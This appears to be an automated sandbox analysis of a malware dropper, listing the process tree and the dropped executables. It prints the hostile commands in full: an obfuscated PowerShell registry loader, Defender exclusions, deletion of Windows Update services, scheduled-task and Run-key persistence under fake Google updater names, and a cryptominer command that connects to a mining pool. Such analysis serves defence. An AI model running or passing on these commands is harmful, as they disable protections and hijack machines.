description pid Process procid_target PID 4888 wrote to memory of 2660 4888 4363463463464363463463463.exe 75 PID 4888 wrote to memory of 2660 4888 4363463463464363463463463.exe 75 PID 4888 wrote to memory of 2660 4888 4363463463464363463463463.exe 75 PID 4888 wrote to memory of 3552 4888 4363463463464363463463463.exe 77 PID 4888 wrote to memory of 3552 4888 4363463463464363463463463.exe 77 PID 4888 wrote to memory of 3552 4888 4363463463464363463463463.exe 77 PID 2660 wrote to memory of 5028 2660 jopacrypt.exe 78 PID 2660 wrote to memory of 5028 2660 jopacrypt.exe 78 PID 2660 wrote to memory of 5028 2660 jopacrypt.exe 78 PID 2660 wrote to memory of 5028 2660 jopacrypt.exe 78 PID 2660 wrote to memory of 5028 2660 jopacrypt.exe 78 PID 2660 wrote to memory of 5028 2660 jopacrypt.exe 78 PID 2660 wrote to memory of 5028 2660 jopacrypt.exe 78 PID 2660 wrote to memory of 5028 2660 jopacrypt.exe 78 PID 3552 wrote to memory of 2940 3552 InstallSetup9.exe 79 PID 3552 wrote to memory of 2940 3552 InstallSetup9.exe 79 PID 3552 wrote to memory of 2940 3552 InstallSetup9.exe 79 PID 3552 wrote to memory of 4372 3552 InstallSetup9.exe 80 PID 3552 wrote to memory of 4372 3552 InstallSetup9.exe 80 PID 3552 wrote to memory of 4372 3552 InstallSetup9.exe 80 PID 4888 wrote to memory of 1676 4888 4363463463464363463463463.exe 81 PID 4888 wrote to memory of 1676 4888 4363463463464363463463463.exe 81 PID 4888 wrote to memory of 1676 4888 4363463463464363463463463.exe 81 PID 2940 wrote to memory of 1268 2940 BroomSetup.exe 82 PID 2940 wrote to memory of 1268 2940 BroomSetup.exe 82 PID 2940 wrote to memory of 1268 2940 BroomSetup.exe 82 PID 1268 wrote to memory of 3880 1268 cmd.exe 84 PID 1268 wrote to memory of 3880 1268 cmd.exe 84 PID 1268 wrote to memory of 3880 1268 cmd.exe 84 PID 1268 wrote to memory of 4740 1268 cmd.exe 85 PID 1268 wrote to memory of 4740 1268 cmd.exe 85 PID 1268 wrote to memory of 4740 1268 cmd.exe 85 PID 4888 wrote to memory of 2804 4888 4363463463464363463463463.exe 86 PID 4888 wrote to memory of 2804 4888 4363463463464363463463463.exe 86 PID 4888 wrote to memory of 2740 4888 4363463463464363463463463.exe 87 PID 4888 wrote to memory of 2740 4888 4363463463464363463463463.exe 87 PID 4888 wrote to memory of 2740 4888 4363463463464363463463463.exe 87 PID 4888 wrote to memory of 5080 4888 4363463463464363463463463.exe 88 PID 4888 wrote to memory of 5080 4888 4363463463464363463463463.exe 88 PID 4888 wrote to memory of 5080 4888 4363463463464363463463463.exe 88 PID 4888 wrote to memory of 3896 4888 4363463463464363463463463.exe 89 PID 4888 wrote to memory of 3896 4888 4363463463464363463463463.exe 89 PID 4888 wrote to memory of 3896 4888 4363463463464363463463463.exe 89 PID 4888 wrote to memory of 2816 4888 4363463463464363463463463.exe 90 PID 4888 wrote to memory of 2816 4888 4363463463464363463463463.exe 90 PID 4888 wrote to memory of 3828 4888 4363463463464363463463463.exe 91 PID 4888 wrote to memory of 3828 4888 4363463463464363463463463.exe 91 PID 3828 wrote to memory of 3132 3828 ma.exe 93 PID 3828 wrote to memory of 3132 3828 ma.exe 93 PID 3132 wrote to memory of 3544 3132 cmd.exe 94 PID 3132 wrote to memory of 3544 3132 cmd.exe 94 PID 2804 wrote to memory of 4212 2804 dmi1dfg7n.exe 95 PID 2804 wrote to memory of 4212 2804 dmi1dfg7n.exe 95 PID 2804 wrote to memory of 4376 2804 dmi1dfg7n.exe 102 PID 2804 wrote to memory of 4376 2804 dmi1dfg7n.exe 102 PID 2804 wrote to memory of 3708 2804 dmi1dfg7n.exe 99 PID 2804 wrote to memory of 3708 2804 dmi1dfg7n.exe 99 PID 2804 wrote to memory of 4172 2804 dmi1dfg7n.exe 98 PID 2804 wrote to memory of 4172 2804 dmi1dfg7n.exe 98 PID 3708 wrote to memory of 1140 3708 cmd.exe 104 PID 3708 wrote to memory of 1140 3708 cmd.exe 104 PID 4376 wrote to memory of 4552 4376 cmd.exe 105 PID 4376 wrote to memory of 4552 4376 cmd.exe 105 PID 3708 wrote to memory of 1268 3708 cmd.exe 106 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3934047325-4097474570-3437169968-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Setup.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3934047325-4097474570-3437169968-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Setup.exe
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:644
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 644 -s 39122⤵PID:4212
-
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:588
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of FindShellTrayWindow
PID:996
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{9c4a676d-1585-43bc-bef4-348fd88bcbc0}2⤵PID:928
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{cecbf5ca-5b11-4d4d-9963-43c2df7ebbf4}2⤵PID:3092
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 588 -s 9242⤵PID:2844
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵PID:1128
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:3204
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
PID:2944
-
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Executes dropped EXE
PID:3544 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force3⤵PID:708
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4552
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 708 -s 4084⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:676
-
-
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:4704
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
PID:1060
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:808
-
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
PID:4224
-
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
PID:1720
-
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
PID:4152
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f4⤵PID:60
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f4⤵PID:1524
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f4⤵PID:3744
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f4⤵PID:884
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵PID:4544
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1212 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4652
-
-
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵PID:1228
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵PID:4224
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵PID:3760
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵PID:3880
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵PID:616
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe xtrjicqmdliu3⤵PID:4052
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"4⤵
- Drops file in Program Files directory
PID:620
-
-
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"3⤵PID:844
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor4⤵
- Detects videocard installed
PID:4220
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe wvhbfinhdckusjju 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZeXwQ/O4+due3etuok0KCy6TAeBBK2Zj7dzTkc9P7Txuspl/ztFHeT1vDsXwtgxIFZnxGXI+P7h6Wy2BaqsXFRrbRIyylpVUfDVtjurLuTI6hfYZYlaT2c8T3z2D8KilAioXHHI3GdcX8L+5AQJHhaF3EikxjkII2qRl4IAJt0ne1Kthho/EoWoWqiJ8V46anYGIeeueaKL6G4gUS0jG8bW+uOPYpliibsIQvftJQy3GdQNbdmaQoQosbMtF/zsQIOPYtzoBcdM/sdKVWCIsST/Py6kltT+qpekCzJYBFF4LST+8+EmmopPFkm4CPe5KhMiY/+g/sQ7d50uqIjFwwoHwsdnFS1l7B7kznzCIpeqO/4VPcOjXZ8D/gqWFx/7uyyvuxXByWtdfg2SHIbTo9ax767hx8DEZJobkKiCLCF5s3S9KZPJ6oc8SVkEHvmPn3ocLOCMVNSrrmyVksnNDnuU8b1vWVxnieD7xm0UnpffWA=3⤵PID:4352
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
PID:2772
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵PID:1168
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵PID:1500
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2432
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2696
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3380 -
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"2⤵
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4888 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:320
-
-
C:\Users\Admin\AppData\Local\Temp\Files\jopacrypt.exe"C:\Users\Admin\AppData\Local\Temp\Files\jopacrypt.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:5028
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup9.exe"C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup9.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3552 -
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exeC:\Users\Admin\AppData\Local\Temp\BroomSetup.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:1268 -
C:\Windows\SysWOW64\chcp.comchcp 12516⤵PID:3880
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F6⤵
- Creates scheduled task(s)
PID:4740
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsd829F.tmpC:\Users\Admin\AppData\Local\Temp\nsd829F.tmp4⤵
- Executes dropped EXE
PID:4372
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1676
-
-
C:\Users\Admin\AppData\Local\Temp\Files\dmi1dfg7n.exe"C:\Users\Admin\AppData\Local\Temp\Files\dmi1dfg7n.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4212
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4172
-
-
C:\Windows\SYSTEM32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
- Suspicious use of WriteProcessMemory
PID:3708 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
PID:1140
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
PID:1268
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
PID:1580
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
PID:1288
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵
- Suspicious use of WriteProcessMemory
PID:4376 -
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
PID:4552
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
PID:4812
-
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
PID:3696
-
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
PID:4876
-
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
PID:2848
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f5⤵PID:4404
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f5⤵PID:600
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f5⤵
- Modifies security service
PID:756
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f5⤵PID:1912
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f5⤵PID:1884
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }4⤵PID:4124
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC5⤵PID:4224
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵
- Drops file in Windows directory
PID:4308
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\75d8077636ee1ec7b44f33cfdc65dc4a5b96d4c0b9ac3df0879b97e2bae1f9dd.exe"C:\Users\Admin\AppData\Local\Temp\Files\75d8077636ee1ec7b44f33cfdc65dc4a5b96d4c0b9ac3df0879b97e2bae1f9dd.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2740
-
-
C:\Users\Admin\AppData\Local\Temp\Files\plaza.exe"C:\Users\Admin\AppData\Local\Temp\Files\plaza.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:5080
-
-
C:\Users\Admin\AppData\Local\Temp\Files\v2.exe"C:\Users\Admin\AppData\Local\Temp\Files\v2.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:3896 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe4⤵PID:1056
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Files\Setup.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- outlook_office_path
- outlook_win_path
PID:2816 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\Setup.exe"4⤵PID:2308
-
C:\Windows\system32\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:2240
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3828 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpAC7C.tmp.bat""4⤵
- Suspicious use of WriteProcessMemory
PID:3132 -
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:3544
-
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2000 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"6⤵PID:772
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"7⤵
- Creates scheduled task(s)
PID:1048
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl6⤵
- Suspicious use of FindShellTrayWindow
PID:1664
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe"C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe"3⤵
- Executes dropped EXE
PID:2192
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Cheat.exe"C:\Users\Admin\AppData\Local\Temp\Files\Cheat.exe"3⤵PID:1200
-
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:1696
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1696 -s 10282⤵PID:3164
-
-
C:\Windows\System32\InstallAgent.exeC:\Windows\System32\InstallAgent.exe -Embedding1⤵PID:2152
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:408
-
C:\Windows\system32\ApplicationFrameHost.exeC:\Windows\system32\ApplicationFrameHost.exe -Embedding1⤵PID:1408
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:5104
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5104 -s 7242⤵PID:5044
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵PID:2676
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Modifies data under HKEY_USERS
PID:2316
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵PID:4456
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵PID:5112
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵PID:4916
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3924
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s TokenBroker1⤵PID:3264
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵PID:3124
-
c:\windows\system32\sihost.exesihost.exe1⤵PID:3112
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2824
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵PID:2440
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵PID:2416
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2392
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵PID:2352
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵PID:2296
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2276
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵PID:2268
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵PID:2108
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵PID:2060
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:984
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵PID:1980
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1876
-
